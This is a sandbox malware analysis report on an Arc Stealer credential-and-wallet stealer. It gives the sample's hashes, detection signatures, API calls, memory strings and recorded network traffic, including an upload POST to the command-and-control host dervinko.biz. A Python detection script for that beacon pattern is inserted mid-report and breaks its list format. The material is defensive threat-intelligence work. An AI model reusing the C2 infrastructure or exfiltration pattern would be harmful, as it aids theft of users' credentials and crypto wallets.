
Windows Analysis Report
Gj8P0mbklo.exe

Overview

General Information

Sample name: Gj8P0mbklo.exe (renamed because the original name is a hash value)
Original sample name: f7d15a3027d3a430511630c91898c72b91b5fb42bf99315cc5a5ef009a473835.exe
Analysis ID: 1436772
MD5: bad3fa5127efcc9c678c5d71fce0d0b2
SHA1: c5f49dd54b71eaf4e1ba3a9fdfc51c7fb8afbea8
SHA256: f7d15a3027d3a430511630c91898c72b91b5fb42bf99315cc5a5ef009a473835
Tags: ACRStealer, exe

Detection

Arc Stealer
Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Arc Stealer
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Gj8P0mbklo.exe (PID: 6256 cmdline: "C:\Users\user\Desktop\Gj8P0mbklo.exe" MD5: BAD3FA5127EFCC9C678C5D71FCE0D0B2)
  • cleanup
No configs have been found
Yara matches (Source / Rule / Description / Author):
  Source: 00000000.00000002.2152455570.00000000027B1000.00000004.00000020.00020000.00000000.sdmp
    Rule: JoeSecurity_CredentialStealer
    Description: Yara detected Credential Stealer
    Author: Joe Security
  Source: Process Memory Space: Gj8P0mbklo.exe PID: 6256
    Rule: JoeSecurity_ArcStealer
    Description: Yara detected Arc Stealer
    Author: Joe Security
  Source: Process Memory Space: Gj8P0mbklo.exe PID: 6256
    Rule: JoeSecurity_CredentialStealer
    Description: Yara detected Credential Stealer
    Author: Joe Security
No Sigma rule has matched
No Snort rule has matched


        AV Detection

Source: Gj8P0mbklo.exe | Avira: detected
Source: Gj8P0mbklo.exe | ReversingLabs: Detection: 57%
Source: Gj8P0mbklo.exe | Virustotal: Detection: 61%
Source: Gj8P0mbklo.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe | Code function: 0_2_00356F10 Concurrency::cancel_current_task,lstrlenA,GetProcessHeap,HeapAlloc,CryptUnprotectData,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetFileAttributesA,GetFileAttributesA,GetFileAttributesA,0_2_00356F10
Source: Gj8P0mbklo.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP
Source: unknown | HTTPS traffic detected: 23.61.62.148:443 -> 192.168.2.6:49699 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.13.203:443 -> 192.168.2.6:49700 version: TLS 1.2
Source: Gj8P0mbklo.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe | Code function: 0_2_003701C0 FindFirstFileA,PathMatchSpecA,0_2_003701C0
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe | Code function: 0_2_0035CE40 FindFirstFileA,FindNextFileA,Sleep,0_2_0035CE40
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe | Code function: 0_2_00389AFB FindFirstFileExW,0_2_00389AFB
Source: Joe Sandbox View | IP Address: 23.61.62.148
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\Gj8P0mbklo.exe | Code function: 0_2_0036F560 InternetOpenUrlA,Sleep,InternetReadFile,InternetReadFile,0_2_0036F560
Source: global traffic | HTTP traffic detected:
  GET /profiles/76561199609719039 HTTP/1.1
  User-Agent: MyApp/1.0
  Host: steamcommunity.com
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
  GET /ujs/89737b57-777d-400d-bb7f-77b7e024920e HTTP/1.1
  User-Agent: MyApp/1.0
  Host: dervinko.biz
  Cache-Control: no-cache
Source: Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: global traffic | DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic | DNS traffic detected: DNS query: dervinko.biz
Source: unknown | HTTP traffic detected:
  POST /Up HTTP/1.1
  Content-Type: application/octet-stream; boundary=----
  User-Agent: MyApp/1.0
  Host: dervinko.biz
  Content-Length: 341
  Cache-Control: no-cache
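The three requests recorded above (a Steam profile fetch, a GET to dervinko.biz, then a POST to /Up) are the sample's entire observable HTTP footprint, and two details make them easy to hunt for: every request carries the hard-coded, non-browser User-Agent "MyApp/1.0", and the upload declares "application/octet-stream; boundary=----", a boundary parameter on a non-multipart media type that no standard HTTP client library emits. The following is an added example, not part of the Joe Sandbox report, of detection logic that parses proxy-style request records and flags those traits individually and as a chain. The request records are constructed here from the report's HTTP lines (one benign browser request is added for contrast), and the finding names and the chain rule are this example's own assumptions rather than anything the report defines.

```python
"""Added example (not from the Joe Sandbox report): hunting logic for the
HTTP beaconing pattern recorded above.  Request records are constructed from
the report's "HTTP traffic detected" lines; finding names and the chain rule
are this example's own assumptions."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Indicators taken from the report's traffic section.
SUSPECT_UA = "MyApp/1.0"            # hard-coded non-browser User-Agent
C2_HOSTS = {"dervinko.biz"}         # host that receives the POST /Up upload
STEAM_PROFILE_RE = re.compile(r"^/profiles/\d{17}$")   # 64-bit SteamID path
UJS_RE = re.compile(r"^/ujs/[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}$")


@dataclass
class Request:
    method: str
    path: str
    host: str
    user_agent: str
    content_type: str = ""
    content_length: int = 0


def parse_request(raw: str) -> Request:
    """Parse the head of an HTTP/1.1 request (request line plus headers)."""
    lines = raw.strip().splitlines()
    method, path, _version = lines[0].split(" ", 2)
    headers: dict[str, str] = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return Request(
        method=method,
        path=path,
        host=headers.get("host", ""),
        user_agent=headers.get("user-agent", ""),
        content_type=headers.get("content-type", ""),
        content_length=int(headers.get("content-length", "0") or 0),
    )


def score_request(req: Request) -> list[str]:
    """Return the names of every indicator a single request matches."""
    findings: list[str] = []
    if req.user_agent == SUSPECT_UA:
        findings.append("generic_user_agent")
    if req.host in C2_HOSTS:
        findings.append("known_c2_host")
    # A boundary parameter only belongs on multipart/*; the sample sends it on
    # application/octet-stream, which no standard client library does.
    ctype = req.content_type.lower()
    if "boundary=" in ctype and not ctype.startswith("multipart/"):
        findings.append("boundary_on_non_multipart")
    if req.method == "POST" and req.path == "/Up":
        findings.append("upload_endpoint")
    if UJS_RE.match(req.path):
        findings.append("ujs_uuid_path")
    # Profile pages are normally fetched by a browser, so a bare custom UA is odd.
    if (req.host == "steamcommunity.com" and STEAM_PROFILE_RE.match(req.path)
            and not req.user_agent.startswith("Mozilla/")):
        findings.append("steam_profile_fetch_non_browser")
    return findings


def detect_chain(reqs: list[Request]) -> bool:
    """True when one User-Agent fetches a Steam profile, then GETs a different
    host, then POSTs a malformed octet-stream body (the order seen here)."""
    stage, chain_ua = 0, None
    for req in reqs:
        found = score_request(req)
        if stage == 0 and "steam_profile_fetch_non_browser" in found:
            stage, chain_ua = 1, req.user_agent
        elif (stage == 1 and req.user_agent == chain_ua
              and req.method == "GET" and req.host != "steamcommunity.com"):
            stage = 2
        elif (stage == 2 and req.user_agent == chain_ua
              and req.method == "POST" and "boundary_on_non_multipart" in found):
            return True
    return False


# Constructed from the report's three observed requests (CRLF separated).
SAMPLE_REQUESTS = [
    "GET /profiles/76561199609719039 HTTP/1.1\r\nUser-Agent: MyApp/1.0\r\n"
    "Host: steamcommunity.com\r\nCache-Control: no-cache\r\n",
    "GET /ujs/89737b57-777d-400d-bb7f-77b7e024920e HTTP/1.1\r\nUser-Agent: MyApp/1.0\r\n"
    "Host: dervinko.biz\r\nCache-Control: no-cache\r\n",
    "POST /Up HTTP/1.1\r\nContent-Type: application/octet-stream; boundary=----\r\n"
    "User-Agent: MyApp/1.0\r\nHost: dervinko.biz\r\nContent-Length: 341\r\n"
    "Cache-Control: no-cache\r\n",
]
# Constructed benign control: the same profile page fetched by a browser.
BENIGN_REQUEST = ("GET /profiles/76561199609719039 HTTP/1.1\r\n"
                  "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\n"
                  "Host: steamcommunity.com\r\n")

if __name__ == "__main__":
    for raw in SAMPLE_REQUESTS + [BENIGN_REQUEST]:
        req = parse_request(raw)
        print(req.method, req.host, req.path, score_request(req))
    print("chain:", detect_chain([parse_request(r) for r in SAMPLE_REQUESTS]))
```

Scoring each request on its own catches the malformed Content-Type and the custom User-Agent even when the C2 host changes; the chain rule is the stricter signal, since a legitimate client has no reason to fetch a Steam profile with a non-browser agent and then upload a body to an unrelated host under the same agent string.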
Source: Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:27060
Source: Gj8P0mbklo.exe, 00000000.00000003.2145279946.00000000052ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: Gj8P0mbklo.exe, 00000000.00000003.2145279946.00000000052ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: Gj8P0mbklo.exe, 00000000.00000003.2145279946.00000000052ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: Gj8P0mbklo.exe, 00000000.00000003.2145279946.00000000052ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: Gj8P0mbklo.exe, 00000000.00000003.2145279946.00000000052ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: Gj8P0mbklo.exe, 00000000.00000003.2145279946.00000000052ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: Gj8P0mbklo.exe, 00000000.00000003.2145279946.00000000052ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: Gj8P0mbklo.exe, 00000000.00000003.2145279946.00000000052ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: Gj8P0mbklo.exe, 00000000.00000003.2145279946.00000000052ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: Gj8P0mbklo.exe, 00000000.00000003.2145279946.00000000052ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: Gj8P0mbklo.exe, 00000000.00000003.2145279946.00000000052ED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: Gj8P0mbklo.exe, 00000000.00000003.2108844417.0000000005138000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.steampowered.com/
Source: 76561199609719039[1].htm.0.dr | String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
Source: Gj8P0mbklo.exe, 00000000.00000003.2108844417.0000000005138000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Gj8P0mbklo.exe, 00000000.00000003.2108844417.0000000005138000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Gj8P0mbklo.exe, 00000000.00000003.2108844417.0000000005138000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://checkout.steampowered.com/
Source: Gj8P0mbklo.exe, 00000000.00000003.2077523999.00000000027C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/
Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=tIrWyaxi8ABA&a
Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | String found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh
Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=roSu8uqw
Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=_Vry
Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english
Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=L35TrLJDfqtD&l=engl
Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english
Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=KyfgrihL0xta&l=e
Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
Source: 76561199609719039[1].htm.0.dr | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&l=en
Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002805000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2083094344.0000000002803000.00000004.00000020.00020000.00000000.sdmp, 76561199609719039[1].htm.0.dr | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.00000000027B1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dervinko.biz
Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.00000000027B1000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000002.2152864496.000000000507F000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2151826752.000000000507F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dervinko.biz/
Source: Gj8P0mbklo.exe, 00000000.00000002.2152455570.0000000002835000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2098131315.00000000050CE000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2098197482.00000000050CE000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2108525906.00000000050C8000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2108951092.00000000050CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dervinko.biz/Up
Source: Gj8P0mbklo.exe, 00000000.00000003.2151826752.000000000507F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dervinko.biz/Up/b
Source: Gj8P0mbklo.exe, 00000000.00000003.2145448565.000000000507F000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000002.2152864496.000000000507F000.00000004.00000020.00020000.00000000.sdmp, Gj8P0mbklo.exe, 00000000.00000003.2151826752.000000000507F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dervinko.biz/Up/b/
